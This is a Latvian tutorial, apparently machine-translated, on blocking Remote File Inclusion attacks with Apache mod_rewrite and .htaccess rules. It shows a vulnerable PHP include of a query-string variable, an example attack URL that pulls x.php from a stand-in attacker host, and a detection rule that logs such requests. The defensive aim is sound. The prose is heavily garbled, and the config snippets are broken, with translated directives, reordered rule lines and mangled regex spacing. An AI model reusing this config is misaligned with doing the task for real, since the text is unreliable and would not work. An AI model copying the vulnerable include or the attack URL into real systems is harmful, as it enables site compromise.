Izmantojot mod_rewrite, lai novērstu iekļaušanu attālos failus

Viens no biežākajiem uzbrukumiem cieta mājas tiek veikta, izmantojot mēģināts iekļaut failus, kas satur ļaundabīgo kodu, teorētiski runājot par uzbrukums ir ļoti viegli veikt, to darīt tikai tāpēc, ka failu, kas satur ļaunprātīgu kodu un URL tipu pārlūku.

Šāda uzbrukuma, kas pazīstams ar tehnisko terminu Remote File iekļaušanas vai ar vienkāršu akronīms RFI, ierakstiet bieži ir saistīta ar veidu sauc par apsardzes XSA (Cross-Server Attack) parasti tiek darīts, lai neapdraudētu drošību Web vietu ja ne uz Web serveri, faktors, kas padara to vēl bīstami RFI.

Sākt uzbrukumu RFI, uzbrucējs vajadzībām "atmiņa" ietvaros pieteikumu, kurā lemt par tā iekļaušanu attālināti, šī "vieta" parasti "caurums" (bug) drošību, padara neaizsargātu skriptu.
Klasisks gadījums noplūdes jutīga pret RFI ir saistīts ar iet lapai, izmantojot mainīgo nosaukumi, tikai vienkārša koda gabals, piemēram, tas var apdraudēt pieteikuma:

 



 # Iekļaut failus caur querystring mainīgo caur







 ietver ($ _GET ['lapa']);

 

In kodu, kuru mēs esam nedefinēta mainīga, vai drīzāk jānosaka atbilstoši parametriem, kas nosūtīti ar querystring, piemēram, ja tiešo URL uz lapu, kurā ierosināts saraksts izskatās šādi:

 



 http://www.sito.com/index.php?pagina=news.php

 

mainīgā $ page vērtība ir vienāda ar "Ziņas" par šo pieteikumu uzbrukums var tikt izpildīts, šādā veidā:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

File "x.php" gadījumā veiksmīgu uzbrukumu, var saturēt jebkāda veida ļaunprātīgu kodu un bojāt daudz lielākus un galīgi nekā no uzbrukuma vienkāršība var veikt, lai domā.

Par laimi, ir daži aizsardzības metodes, ko var izmantot, lai novērstu šādus uzbrukumus, šajā īsa diskusija mēs analizēsim vienu, kas pamatojas uz URL Rewrite modulis (mod_rewrite), ko Apache Web serveri, kas var tikt izmantoti ar metodēm, atšķiras.

Viens no klasiskās nosūtīt instrukcijas Apache Web serveri ir izmantot klasiku. Htaccess failu, kas jāiekļauj mape, ko vēlaties pasargāt no uzbrukumiem.

Pirmā metode, ko mēs izmantojam, ir ievietot vienkāršu noteikumu a. Htaccess failu:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Noteikums nosaka, ka formulētas querystring ("{QUERY_STRING}"), nevar tikt pārnestas argumentiem, kas satur galotnes "http", "https" un "ftp", vienalga, kāda satura iepriekšējo vai nākamo ("(.*)" ) parametri. Ja tas notiek web serveris atgriezīs kļūdas tipa 403 (aizliegts).

Tie, kam ir iespēja tieši piekļūt konfigurācijas failu no Apache (httpd.conf), tas var būt ievietots viens konteiners, kurā direktīvai var būt ietekme salīdzināma ar noteikumiem, kas prededentemente:

 # Pārbaudiet, ka mod_rewrite ir pieejama







 <IfModule Mod_rewrite.c>







 # Aktivizēt URL pārrakstīt motora

 





 RewriteEngine uz

 





 # Mēs, kas mūsu norma pret RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filtrētu iespējamos pieprasījumus iekļaušanai un uzcenojums







 # Vraibile ar vidi [E = varname: vērtība]







 ^(.+)$ RewriteRule - [F, E = RFI: taisnība]

 





 </ IfModule>

 





 # Creaimo žurnālu mēģinājumi RFI mēs identficato







 # Agrāk, izmantojot "vides mainīgais"







 CustomLog / FOLDER_NAME / rfi.log kombinētā env = RFI

Pēc rakstīšanas direktīvas konfigurācijas failu, jums ir saglabātu izmaiņas un restart Web servera, lai stātos spēkā, ņemiet vērā, ka beigās sarakstā, un ārpus konteinera ir iekļauts lūgums, lai izveidotu log failu paredzēts iegrāmatot pieprasījumiem no attālās failu iekļaušana, novērot šo mazo "bloķēšanu piezīmes RFI uzbrukumiem," mēs atklāsim, ka ir Remote File iekļaušanai, mūsu vietnes mēģinājumi ir mazāk retāk nekā ticēja.